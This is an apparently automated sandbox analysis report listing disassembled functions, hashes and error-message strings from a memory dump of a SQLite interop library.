Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: b14c480169a3938c5d79c6106b515fc09d247aad9a3ad45a3ae533e97c4c7c41
Instruction ID: e1134f250b49b4441ab61b8129f9f5f094d029c9966f9929c7a102efc9fa7927
Opcode Fuzzy Hash: b14c480169a3938c5d79c6106b515fc09d247aad9a3ad45a3ae533e97c4c7c41
Instruction Fuzzy Hash: 6901B1B1A10701ABD700DF35E801B8777E4AF00728F008059E95EEB300EB38E6609BE5

Function 6BC6FBF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AC74,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,6BCDD2A7,?,000003E8), ref: 6BC6FC19

Strings

%s at line %d of [%.10s], xrefs: 6BC6FC12
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6FC03
misuse, xrefs: 6BC6FC0D

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 9eb9bb6d4f54456694f5c3fbd8fb704287d609ab5ae249a9d4fe2769854cfb60
Instruction ID: 7dbe76103f8c7f762966ca01db03f8f29fac9a16ddf458d69a634219a846740a
Opcode Fuzzy Hash: 9eb9bb6d4f54456694f5c3fbd8fb704287d609ab5ae249a9d4fe2769854cfb60
Instruction Fuzzy Hash: B8F08273B682143BE61466B47D07FC6638CCB406B9F100066FA0CEA282FA5DA72011AA

Function 6BC58A50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0001C826,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC58A78

Strings

%s at line %d of [%.10s], xrefs: 6BC58A71
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC58A62
misuse, xrefs: 6BC58A6C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 90112bbd2df2f19bc51747569bb4105a4a2222aacd81f0bf1201334d6b5af82d
Instruction ID: 4f857eb8e41607c57e61d044e2d50b27e826f59ada749e6e1bc39df6f78d1b17
Opcode Fuzzy Hash: 90112bbd2df2f19bc51747569bb4105a4a2222aacd81f0bf1201334d6b5af82d
Instruction Fuzzy Hash: 3F01A271B207155BEB00AF749806E8B7798AB40729F444068E91DEB341EA38E62187E5

Function 6BC59010 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015D01,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC59039

Strings

%s at line %d of [%.10s], xrefs: 6BC59032
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC59023
misuse, xrefs: 6BC5902D

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 39a828e9303d1d0aed0f8104156c1db2dd141999b17c8acf0c5febcf9cdee139
Instruction ID: d04c715d4bb3a87748f014031e1b904aa85bbf2d87976bc8fc248285d6efc32d
Opcode Fuzzy Hash: 39a828e9303d1d0aed0f8104156c1db2dd141999b17c8acf0c5febcf9cdee139
Instruction Fuzzy Hash: A1F0A4B27102005B9B009BBAEC05D47779CABC0A29B0444A4FA0DEB242F679E62482B5

Function 6BCCB650 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(%z%s"%w"."%w"."%w" IS NOT "%w"."%w"."%w",00000000,6BD06F50,?,?,?,?,?,?,?,?,?,6BCDE8E3,?,?,?), ref: 6BCCB68B
SIdb45e174afb28e2c.SQLITE.INTEROP(6BD08268,?,?,?,6BCDE8E3,?,?,?,?,?,00000000,6BCE21D9,?,?), ref: 6BCCB6AB

Strings

%z%s"%w"."%w"."%w" IS NOT "%w"."%w"."%w", xrefs: 6BCCB686
OR , xrefs: 6BCCB693

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Idb45e174afb28e2c.
String ID: OR $%z%s"%w"."%w"."%w" IS NOT "%w"."%w"."%w"
API String ID: 778684903-3447757330
Opcode ID: cf490d7bab2d306948a7c07c1754d39fbb75235e9a9c6a20312179694650f98c
Instruction ID: 4e778476c3a2edc973859f7f1865406bd575dd7837e2520ba0fd896ef8c1b9b4
Opcode Fuzzy Hash: cf490d7bab2d306948a7c07c1754d39fbb75235e9a9c6a20312179694650f98c
Instruction Fuzzy Hash: 3DF0A4B1A2410D6BEB188EA0DD81E6777AA9794358F004038FC054B201FB75AD8187A3

Function 6BC57A70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002ABDE,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57A98

Strings

%s at line %d of [%.10s], xrefs: 6BC57A91
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57A82
misuse, xrefs: 6BC57A8C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 82479bd5aa9ee4b9ae1c02bd8b0d0821c99b37a3d6bf134457eb5d1c9a772cf1
Instruction ID: 79dfe27b4416677eaae1223369d689d06a789fa85f09371f0e91ef51b1496f71
Opcode Fuzzy Hash: 82479bd5aa9ee4b9ae1c02bd8b0d0821c99b37a3d6bf134457eb5d1c9a772cf1
Instruction Fuzzy Hash: 97F08172B107145BDB00DF69E802E4B7798EF40625F04846AFE5EEB301EA38E62487A5

Function 6BC579F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002ABF7,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57A18

Strings

%s at line %d of [%.10s], xrefs: 6BC57A11
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57A02
misuse, xrefs: 6BC57A0C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: e3a40155bd77cb6460c8b92ab60c7cf98b7d6f105dc9b427641347601f3b718b
Instruction ID: fc2736646e127b6f4318ed3c94b0219a0b77bcf7ceaef16b12e05b2546c2bc5b
Opcode Fuzzy Hash: e3a40155bd77cb6460c8b92ab60c7cf98b7d6f105dc9b427641347601f3b718b
Instruction Fuzzy Hash: E0F0D172B107155BDB10DF69AC02E977798EF40624F044069FA2EEB701FA38EA6087A5

Function 6BC57970 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AC10,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57998

Strings

%s at line %d of [%.10s], xrefs: 6BC57991
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57982
misuse, xrefs: 6BC5798C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 4dff3d2d74397b99bef4cd4a08c70a49271640b77db16b61eda30f76437836c0
Instruction ID: 75a45aadc2e0163c8e880cf86e5a4aad34d3d5b1ae918422b01fb75f55af2eaa
Opcode Fuzzy Hash: 4dff3d2d74397b99bef4cd4a08c70a49271640b77db16b61eda30f76437836c0
Instruction Fuzzy Hash: C5F0F472B107115BDB10AF79AC02E477798EF40624F004039FE2DEB302F638F92086A9

Function 6BC57FC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A9EE,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57FE8

Strings

%s at line %d of [%.10s], xrefs: 6BC57FE1
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57FD2
misuse, xrefs: 6BC57FDC

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 9598819196b97d7583ffe5cea2a0c7d9ef477f4b77f02d0c30a9270443a2d17b
Instruction ID: 76368e902a1373e0525a8b6de298e41d3e1a1bc94f431a5f5bdb463a73cb698c
Opcode Fuzzy Hash: 9598819196b97d7583ffe5cea2a0c7d9ef477f4b77f02d0c30a9270443a2d17b
Instruction Fuzzy Hash: A00181B1A117149BDB10AF64E806B8777A8AF40729F004469ED6EEB341EB38E52087A5

Function 6BC57180 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B293,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC571A8

Strings

%s at line %d of [%.10s], xrefs: 6BC571A1
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57192
misuse, xrefs: 6BC5719C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: d7ad2eda8001ddb366f62baf02ae8587ec740a172b2a7e9edaad902f6dfcef99
Instruction ID: 385bf1119ce21315db6e106bd8532d556ded7bb32f6e5f394c9a913eb9428879
Opcode Fuzzy Hash: d7ad2eda8001ddb366f62baf02ae8587ec740a172b2a7e9edaad902f6dfcef99
Instruction Fuzzy Hash: B3F0F672A50B155BEB00AF78EC06A4737989F00B29F004075F91DEB381F62CE66042E5

Function 6BC57040 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B5A9,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57068

Strings

%s at line %d of [%.10s], xrefs: 6BC57061
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57052
misuse, xrefs: 6BC5705C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 6f78b9f4e9fdb12b06c9746eaa7e0473f55207a7b64442927038d75f276c0ef0
Instruction ID: f5934a89ca92f29f58c0a5f1634b0201f7a284d85f1004e54067fdef4312bcc2
Opcode Fuzzy Hash: 6f78b9f4e9fdb12b06c9746eaa7e0473f55207a7b64442927038d75f276c0ef0
Instruction Fuzzy Hash: 4AF0F6327202105B9A109F39DC01F1737D89B407A8B0081A2B91DDF282FB1DEAB092F9

Function 6BC51CB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000007,failed to HeapCompact (no space), heap=%p,06900000), ref: 6BC51CDE
SI769271af19a2299d.SQLITE.INTEROP(00000001,failed to HeapCompact (%lu), heap=%p,00000000), ref: 6BC51CF9

Strings

failed to HeapCompact (%lu), heap=%p, xrefs: 6BC51CF2
failed to HeapCompact (no space), heap=%p, xrefs: 6BC51CD7

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: failed to HeapCompact (%lu), heap=%p$failed to HeapCompact (no space), heap=%p
API String ID: 2981141233-3632242515
Opcode ID: e621a0c131026c84506faeed0abaa07452c524d24b8adf7199737b547a2749ec
Instruction ID: 1a5b139748bb5dacb6ed8d69931aad94194b0958dddd15d9095698398143bfb7
Opcode Fuzzy Hash: e621a0c131026c84506faeed0abaa07452c524d24b8adf7199737b547a2749ec
Instruction Fuzzy Hash: 84F09C72A452206FE6011F9A9C49E57BB6CEB42679F400060F90CDE141F759E91582F5

Function 6BC58690 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000247EF,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000,?,?,6BCD2738,?,?,0000001C,00000000,6BC02BF0), ref: 6BC586DC

Strings

%s at line %d of [%.10s], xrefs: 6BC586D5
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC586C6
misuse, xrefs: 6BC586D0

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: e597695ee7728fe0a3fc451f266351315aa6b28abfc42e0754d28af217790417
Instruction ID: 310d255445807c55846da9f6af7bd0b50bccb886beff7a516a31bff58e65b093
Opcode Fuzzy Hash: e597695ee7728fe0a3fc451f266351315aa6b28abfc42e0754d28af217790417
Instruction Fuzzy Hash: C0F0E9B73241046BE7005E59EC02D9B375CDB90624F000069F908EB241FA68EA2142F5

Function 6BC81910 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00014F59,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC81954

Strings

%s at line %d of [%.10s], xrefs: 6BC8194D
database corruption, xrefs: 6BC81948
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC8193E

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 78b64d3d794fb80f12c171228ab68a7ec2f9e119e62649b124a859952f42b225
Instruction ID: 4fd515917574142a0bdaebf19dcf3bee50fce927ba55837af42e2f87b3010960
Opcode Fuzzy Hash: 78b64d3d794fb80f12c171228ab68a7ec2f9e119e62649b124a859952f42b225
Instruction Fuzzy Hash: 2AF0E9719247006BD320DA789D06F1377E89745718F0046ACF9ADDB6C1FB25E91487F2

Function 6BC5B800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A753,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5B830

Strings

%s at line %d of [%.10s], xrefs: 6BC5B829
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5B81A
misuse, xrefs: 6BC5B824

Memory Dump Source

